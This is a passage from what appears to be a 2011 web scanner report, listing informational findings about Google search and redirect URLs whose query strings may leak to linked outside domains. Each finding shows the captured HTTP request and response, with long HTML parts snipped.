<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, view maps and get driving directions in Google Maps" name="description"/> <link rel="shortcut icon" href="//maps.gstatic.com/favicon.ico"/> <noscript>
...[SNIP]...
<a class="kd-button print-button left small" title="Print" jsaction="print.show" href="javascript:void(0);" id="print"> <img class="print" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button email-button mid small" title="Send" jsaction="stx.show" href="javascript:void(0);" id="showsendtox"> <img class="send" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a> <a class="kd-button permalink-button right small" title="Link" jsaction="link.show" href="javascript:void(0);" id="link"> <img class="link" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<button class="kd-button kd-button-submit" title="Search Maps" type="submit" id="q-sub" name="btnG" tabindex="2"> <img class="search-white" src="//maps.gstatic.com/mapfiles/transparent.png"/> </button>
...[SNIP]...
</div> <img class="hide-msie-6" src="//maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="//maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="close" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
sName: 'kd-button' + ($count > 1 ? lt($index, 1) ? ' left' : gt($index, $count - 2) ? ' right' : ' mid' : '');" class="kd-button" href="javascript:void(0)" tabindex="3" jsaction="tm.click"> <img jsattrs="className: 'dir-tm-' + $this" class="dir-tm-d" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a class="kd-button" href="javascript:void(0)"> <img class="dir-reverse" src="//maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="icon " log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="XShiTu_iBJzosAOy6uWQAQ" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

17.41. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Transport_Layer_Security
http://securitywatch.pcmag.com/apple/287205-ssl-certificate-scandal-exposes-bug-in-mac-os-x
http://tldp.org/HOWTO/SSL-Certificates-HOWTO/x64.html
http://webcache.googleusercontent.com/search?q=cache:0e-qMWHW5K0J:www.starfieldtech.com/+ssl+certificates&cd=12&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:IjF4vaklL4MJ:www.instantssl.com/+ssl+certificates&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:OLnQ-X3gy7oJ:www.verisign.com/ssl/ssl-information-center/index.html+ssl+certificates&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:OXVhnpgh9iMJ:https://www.thawte.com/products/+ssl+certificates&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:T93DnBbLQ3EJ:en.wikipedia.org/wiki/Transport_Layer_Security+ssl+certificates&cd=6&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:_BiZVPAyALoJ:www.godaddy.com/ssl/ssl-certificates.aspx+ssl+certificates&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:kGUmv5fgUEIJ:www.thesslstore.com/+ssl+certificates&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:oZmfP48nar8J:www.cheapssls.com/+ssl+certificates&cd=11&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:tpR3f-YdRx0J:www.digicert.com/+ssl+certificates&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:usxjGBZ2ohYJ:tldp.org/HOWTO/SSL-Certificates-HOWTO/x64.html+ssl+certificates&cd=7&hl=en&ct=clnk&gl=us
http://www.cheapssls.com/
http://www.digicert.com/
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.instantssl.com/
http://www.starfieldtech.com/
http://www.theregister.co.uk/2011/09/03/diginotar_game_over/
http://www.thesslstore.com/
http://www.verisign.com/ssl/free-30day-trial/
http://www.verisign.com/ssl/ssl-information-center/how-ssl-security-works/
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/ssl/ssl-information-center/ssl-basics/
http://www.youtube.com/results?q=ssl+certificates&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
https://www.thawte.com/products/

Request

GET /search?sourceid=chrome&ie=UTF-8&q=ssl+certificates HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=dYdXb1ScZWRJMvBrNEHDfLjfOocGh7bNH6BGA3vRVqKYi3SPaS4s8VflEEZyzxRJp0RFQHbwIFv7qAsJNvrMyJFPuL9b0_3fjdGh0Mx_82XLAISmwar_I3OOxUz-5M-7

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:28:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 118979

<!doctype html> <head> <title>ssl certificates - Google Search</title> <script>window.google={kEI:"_5tiTr_COO_SiAKums2VCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=ssl+certificates&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" class=l onmousedown="return clk(this,this.href,'','','','1','','0CHQQFjAA')">SSL and Online Trust Information Center - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:OLnQ-X3gy7oJ:www.verisign.com/ssl/ssl-information-center/index.html+ssl+certificates&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CHkQIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.verisign.com/ssl/ssl-information-center/how-ssl-security-works/" onmousedown="return clk(this,this.href,'','','','1','','0CHsQ0gIoADAA')">Secure Sockets Layer (SSL): How It ...</a> - <a href="http://www.verisign.com/ssl/free-30day-trial/" onmousedown="return clk(this,this.href,'','','','1','','0CHwQ0gIoATAA')">Free 30-Day SSL Trial</a> - <a href="http://www.verisign.com/ssl/ssl-information-center/ssl-basics/" onmousedown="return clk(this,this.href,'','','','1','','0CH0Q0gIoAjAA')">FAQ: SSL Basics</a>
...[SNIP]...
<h3 class="r"><a href="http://www.godaddy.com/ssl/ssl-certificates.aspx" class=l onmousedown="return clk(this,this.href,'','','','2','','0CIIBEBYwAQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:_BiZVPAyALoJ:www.godaddy.com/ssl/ssl-certificates.aspx+ssl+certificates&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CIQBECAwAQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.digicert.com/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CIkBEBYwAg')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:tpR3f-YdRx0J:www.digicert.com/+ssl+certificates&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CIsBECAwAg')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.theregister.co.uk/2011/09/03/diginotar_game_over/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CJABEKkCMAM')">Dutch CA banished for life from Chrome, Firefox</a>
...[SNIP]...
<span class=tl><a href="http://securitywatch.pcmag.com/apple/287205-ssl-certificate-scandal-exposes-bug-in-mac-os-x" class=l onmousedown="return clk(this,this.href,'','','','5','','0CJYBEKkCMAQ')"><em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Transport_Layer_Security" class=l onmousedown="return clk(this,this.href,'','','','6','','0CJ8BEBYwBQ')">Transport Layer Security - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:T93DnBbLQ3EJ:en.wikipedia.org/wiki/Transport_Layer_Security+ssl+certificates&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CKEBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://tldp.org/HOWTO/SSL-Certificates-HOWTO/x64.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CKYBEBYwBg')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:usxjGBZ2ohYJ:tldp.org/HOWTO/SSL-Certificates-HOWTO/x64.html+ssl+certificates&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CKgBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.thesslstore.com/" class=l onmousedown="return clk(this,this.href,'','','','8','','0CK0BEBYwBw')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:kGUmv5fgUEIJ:www.thesslstore.com/+ssl+certificates&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CK8BECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://www.thawte.com/products/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CLQBEBYwCA')">Thawte Products- <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:OXVhnpgh9iMJ:https://www.thawte.com/products/+ssl+certificates&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CLYBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.instantssl.com/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CLoBEBYwCQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:IjF4vaklL4MJ:www.instantssl.com/+ssl+certificates&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CLwBECAwCQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.cheapssls.com/" class=l onmousedown="return clk(this,this.href,'','','','11','','0CMEBEBYwCg')">Cheap <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:oZmfP48nar8J:www.cheapssls.com/+ssl+certificates&cd=11&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','11','','0CMMBECAwCg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.starfieldtech.com/" class=l onmousedown="return clk(this,this.href,'','','','12','','0CMgBEBYwCw')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:0e-qMWHW5K0J:www.starfieldtech.com/+ssl+certificates&cd=12&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','12','','0CMoBECAwCw')">Cached</a>
...[SNIP]...

17.42. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke

The response contains the following links to other domains:

http://dnngallery.com/blog/id/165/improve-dotnetnuke-performance-with-gzip-compression-in-iis
http://dnnskin.com/KnowledgeBase/DotNetNukeDNNSkins/tabid/500/ID/23/How-to-do-a-Blowery-Compression-DotNetNuke-and-Http-Compression.aspx
http://webcache.googleusercontent.com/search?q=cache:1wmPZnArvlMJ:www.dotnetnuke.com/Resources/Blogs/EntryID/1369/Improvements-to-Compression-Module.aspx+compression+dotnetnuke&cd=4&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:2ZN99VvVSfUJ:www.snapsis.com/DotNetNuke-Performance-Caching-Compression-Optimization.aspx+compression+dotnetnuke&cd=7&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:BLWIjNv-eoEJ:www.mitchelsellers.com/blogs/articletype/articleview/articleid/198/pageid/102.aspx+compression+dotnetnuke&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:EOXn7hjEt_oJ:dnngallery.com/blog/id/165/improve-dotnetnuke-performance-with-gzip-compression-in-iis+compression+dotnetnuke&cd=5&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:G4mS81mAnN4J:dnnskin.com/KnowledgeBase/DotNetNukeDNNSkins/tabid/500/ID/23/How-to-do-a-Blowery-Compression-DotNetNuke-and-Http-Compression.aspx+compression+dotnetnuke&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:Vk5WQUbmI8cJ:www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx+compression+dotnetnuke&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:WVfd0yWddUUJ:www.ventrian.com/Resources/Articles/tabid/213/articleType/ArticleView/articleId/46/Enabling-HTTP-Compression-for-DotNetNuke.aspx+compression+dotnetnuke&cd=6&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:f7QXmAgPSLwJ:www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx+compression+dotnetnuke&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:q3uoT0FbOm4J:www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx+compression+dotnetnuke&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:vqpUbSDAi94J:www.bring2mind.net/Support/Forums/tabid/143/aff/1/aft/1800/afv/topic/Default.aspx+compression+dotnetnuke&cd=9&hl=en&ct=clnk&gl=us
http://www.bring2mind.net/Support/Forums/tabid/143/aff/1/aft/1800/afv/topic/Default.aspx
http://www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx
http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx
http://www.dotnetnuke.com/Resources/Blogs/EntryID/1369/Improvements-to-Compression-Module.aspx
http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx
http://www.mitchelsellers.com/blogs/articletype/articleview/articleid/198/pageid/102.aspx
http://www.snapsis.com/DotNetNuke-Performance-Caching-Compression-Optimization.aspx
http://www.ventrian.com/Resources/Articles/tabid/213/articleType/ArticleView/articleId/46/Enabling-HTTP-Compression-for-DotNetNuke.aspx
http://www.youtube.com/results?q=compression+dotnetnuke&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=compression+dotnetnuke HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=aYJjaoJUNshldk3FUs-vgsnQPJuDrjBt3LzHNFQ3N3bLmMufnkOZ7iX2MROGgKXHYJfo8-7QDL4Tqk2kAaYx2lrsnOlscEXcdgi_FMD_BsfBB0Tnyn77h3FbX1c9opy9

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 15:05:04 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 99134

<!doctype html> <head> <title>compression dotnetnuke - Google Search</title> <script>window.google={kEI:"IEJiTsXILYPSiALP0bHACg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttri
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=compression+dotnetnuke&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx" class=l onmousedown="return clk(this,this.href,'','','','1','','0CB0QFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Vk5WQUbmI8cJ:www.dnncreative.com/DotNetNukeandHttpCompression/tabid/154/Default.aspx+compression+dotnetnuke&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CB8QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx" class=l onmousedown="return clk(this,this.href,'','','','2','','0CCQQFjAB')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:f7QXmAgPSLwJ:www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx+compression+dotnetnuke&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CCYQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx" class=l onmousedown="return clk(this,this.href,'','','','3','','0CCoQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:q3uoT0FbOm4J:www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx+compression+dotnetnuke&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CCwQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dotnetnuke.com/Resources/Blogs/EntryID/1369/Improvements-to-Compression-Module.aspx" class=l onmousedown="return clk(this,this.href,'','','','4','','0CDAQFjAD')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1wmPZnArvlMJ:www.dotnetnuke.com/Resources/Blogs/EntryID/1369/Improvements-to-Compression-Module.aspx+compression+dotnetnuke&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CDIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dnngallery.com/blog/id/165/improve-dotnetnuke-performance-with-gzip-compression-in-iis" class=l onmousedown="return clk(this,this.href,'','','','5','','0CDgQFjAE')">Improve <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:EOXn7hjEt_oJ:dnngallery.com/blog/id/165/improve-dotnetnuke-performance-with-gzip-compression-in-iis+compression+dotnetnuke&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CDoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.ventrian.com/Resources/Articles/tabid/213/articleType/ArticleView/articleId/46/Enabling-HTTP-Compression-for-DotNetNuke.aspx" class=l onmousedown="return clk(this,this.href,'','','','6','','0CD4QFjAF')">Enabling HTTP <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:WVfd0yWddUUJ:www.ventrian.com/Resources/Articles/tabid/213/articleType/ArticleView/articleId/46/Enabling-HTTP-Compression-for-DotNetNuke.aspx+compression+dotnetnuke&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CEMQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.snapsis.com/DotNetNuke-Performance-Caching-Compression-Optimization.aspx" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEgQFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:2ZN99VvVSfUJ:www.snapsis.com/DotNetNuke-Performance-Caching-Compression-Optimization.aspx+compression+dotnetnuke&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CEoQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dnnskin.com/KnowledgeBase/DotNetNukeDNNSkins/tabid/500/ID/23/How-to-do-a-Blowery-Compression-DotNetNuke-and-Http-Compression.aspx" class=l onmousedown="return clk(this,this.href,'','','','8','','0CE8QFjAH')">How to do a Blowery <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:G4mS81mAnN4J:dnnskin.com/KnowledgeBase/DotNetNukeDNNSkins/tabid/500/ID/23/How-to-do-a-Blowery-Compression-DotNetNuke-and-Http-Compression.aspx+compression+dotnetnuke&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CFEQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bring2mind.net/Support/Forums/tabid/143/aff/1/aft/1800/afv/topic/Default.aspx" class=l onmousedown="return clk(this,this.href,'','','','9','','0CFUQFjAI')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:vqpUbSDAi94J:www.bring2mind.net/Support/Forums/tabid/143/aff/1/aft/1800/afv/topic/Default.aspx+compression+dotnetnuke&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CFsQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mitchelsellers.com/blogs/articletype/articleview/articleid/198/pageid/102.aspx" class=l onmousedown="return clk(this,this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BLWIjNv-eoEJ:www.mitchelsellers.com/blogs/articletype/articleview/articleid/198/pageid/102.aspx+compression+dotnetnuke&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CGEQIDAJ')">Cached</a>
...[SNIP]...

17.43. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=2&ved=0CGMQgwgwAQ&url=http%3A%2F%2Fwww.digicert.com%2Fwelcome%2Fwildcard-plus.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNEUzvUOyhvL6dXjafp918vEGrpS9A

The response contains the following link to another domain:

http://www.digicert.com/welcome/wildcard-plus.htm

Request

GET /url?sa=t&source=productsearch&cd=2&ved=0CGMQgwgwAQ&url=http%3A%2F%2Fwww.digicert.com%2Fwelcome%2Fwildcard-plus.htm&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNEUzvUOyhvL6dXjafp918vEGrpS9A HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.digicert.com/welcome/wildcard-plus.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:27 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.digicert.com/welcome/wildcard-plus.htm">here</A>
...[SNIP]...

17.44. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=8&ved=0CHYQgwgwBw&url=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNHN_OyeAA_icuOvfFl3m2Di-lsPnQ

The response contains the following link to another domain:

http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html

Request

GET /url?sa=t&source=productsearch&cd=8&ved=0CHYQgwgwBw&url=http%3A%2F%2Fwww.cheapssls.com%2Fgeotrust-ssl-certificates%2Fquickssl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNHN_OyeAA_icuOvfFl3m2Di-lsPnQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ssl+certificates#q=ssl+certificates&hl=en&prmd=ivnsufd&source=lnms&tbm=shop&ei=_5tiTr_COO_SiAKums2VCg&sa=X&oi=mode_link&ct=mode&cd=5&ved=0CFYQ_AUoBA&bav=on.2,or.r_gc.r_pw.&fp=d8e70e66cd7c7a51&biw=1233&bih=1037
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 302 Found
Location: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sat, 03 Sep 2011 21:29:45 GMT
Server: gws
Content-Length: 261
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html">here</A>
...[SNIP]...

17.45. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=productsearch&cd=6&ved=0CG8QgwgwBQ&url=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNGYIK8BlCWFaJNkNIqnbxI_I7WD_g

The response contains the following link to another domain:

http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html

Request

GET /url?sa=t&source=productsearch&cd=6&ved=0CG8QgwgwBQ&url=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ei=IpxiTuPlNerliALEhoS2Cg&usg=AFQjCNGYIK8BlCWFaJNkNIqnbxI_I7WD_g HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
